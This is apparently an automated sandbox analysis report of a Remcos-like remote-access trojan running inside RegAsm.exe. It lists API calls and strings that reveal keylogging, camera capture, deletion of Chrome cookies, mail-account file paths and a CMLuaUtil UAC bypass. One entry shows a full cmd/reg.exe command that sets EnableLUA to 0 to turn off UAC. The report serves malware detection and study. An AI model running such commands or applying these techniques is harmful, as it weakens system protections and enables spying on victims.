                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: InitializeObjectUninitialize_wcslen
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                            • API String ID: 3851391207-1839356972
                            • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                            • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                            • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                            • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                            APIs
                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                            • GetLastError.KERNEL32 ref: 0040BB22
                            Strings
                            • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                            • [Chrome Cookies not found], xrefs: 0040BB3C
                            • UserProfile, xrefs: 0040BAE8
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteErrorFileLast
                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                            • API String ID: 2018770650-304995407
                            • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                            • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                            • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                            • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                            Strings
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                            • `.S, xrefs: 004076DF
                            • Rmc-OT0ZCG, xrefs: 00407715
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-OT0ZCG$`.S
                            • API String ID: 0-3949712931
                            APIs
                            • _free.LIBCMT ref: 1000536F
                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                            • _free.LIBCMT ref: 10005381
                            • _free.LIBCMT ref: 10005394
                            • _free.LIBCMT ref: 100053A5
                            • _free.LIBCMT ref: 100053B6
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID: xV
                            • API String ID: 776569668-2633863268
                            APIs
                            • __allrem.LIBCMT ref: 0043ACE9
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                            • __allrem.LIBCMT ref: 0043AD1C
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                            • __allrem.LIBCMT ref: 0043AD51
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 1992179935-0
                            APIs
                            • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                              • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prologSleep
                            • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                            • API String ID: 3469354165-3054508432
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: __cftoe
                            • String ID:
                            • API String ID: 4189289331-0
                            APIs
                            • _strlen.LIBCMT ref: 10001607
                            • _strcat.LIBCMT ref: 1000161D
                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                            • lstrcatW.KERNEL32(?,?), ref: 1000165A
                            • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                            • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: lstrcatlstrlen$_strcat_strlen
                            • String ID:
                            • API String ID: 1922816806-0
                            APIs
                            • lstrcatW.KERNEL32(?,?), ref: 10001038
                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: lstrlen$AttributesFilelstrcat
                            • String ID:
                            • API String ID: 3594823470-0
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                            • String ID:
                            • API String ID: 493672254-0
                            APIs
                            • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                            • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: ErrorLastValue___vcrt_
                            • String ID:
                            • API String ID: 3852720340-0
                            APIs
                            • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                            • _free.LIBCMT ref: 10005B2D
                            • _free.LIBCMT ref: 10005B55
                            • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                            • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                            • _abort.LIBCMT ref: 10005B74
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: ErrorLast$_free$_abort
                            • String ID:
                            • API String ID: 3160817290-0
                            APIs
                            • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • _free.LIBCMT ref: 004482CC
                            • _free.LIBCMT ref: 004482F4
                            • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                            • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • _abort.LIBCMT ref: 00448313
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free$_abort
                            • String ID:
                            • API String ID: 3160817290-0
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            APIs
                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: lstrlen$_strlenlstrcat$AttributesFile
                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                            • API String ID: 4036392271-1520055953
                            APIs
                            • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                            • wsprintfW.USER32 ref: 0040B22E
                              • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: EventLocalTimewsprintf
                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                            • API String ID: 1497725170-248792730
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: X8S
                            • API String ID: 0-2014517935
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                            • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                            • CloseHandle.KERNEL32(00000000), ref: 0040A729
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSizeSleep
                            • String ID: XQG
                            • API String ID: 1958988193-3606453820
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ClassCreateErrorLastRegisterWindow
                            • String ID: 0$MsgWindowClass
                            APIs
                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                            • CloseHandle.KERNEL32(?), ref: 004077E5
                            • CloseHandle.KERNEL32(?), ref: 004077EA
                            Strings
                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                            • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: CloseHandle$CreateProcess
                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                            • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                            • CloseHandle.KERNEL32(?), ref: 00405140
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                            • String ID: KeepAlive | Disabled
                            APIs
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                            • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                            • Sleep.KERNEL32(00002710), ref: 0041AE98
                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: PlaySound$HandleLocalModuleSleepTime
                            • String ID: Alarm triggered
                            APIs
                            • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                            • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                            • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                            Strings
                            • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Console$AttributeText$BufferHandleInfoScreen
                            • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            APIs
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                            • _free.LIBCMT ref: 0044943D
                              • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                              • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                            • _free.LIBCMT ref: 00449609
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                            APIs
                              • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                              • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                            • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                            • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                              • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                              • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
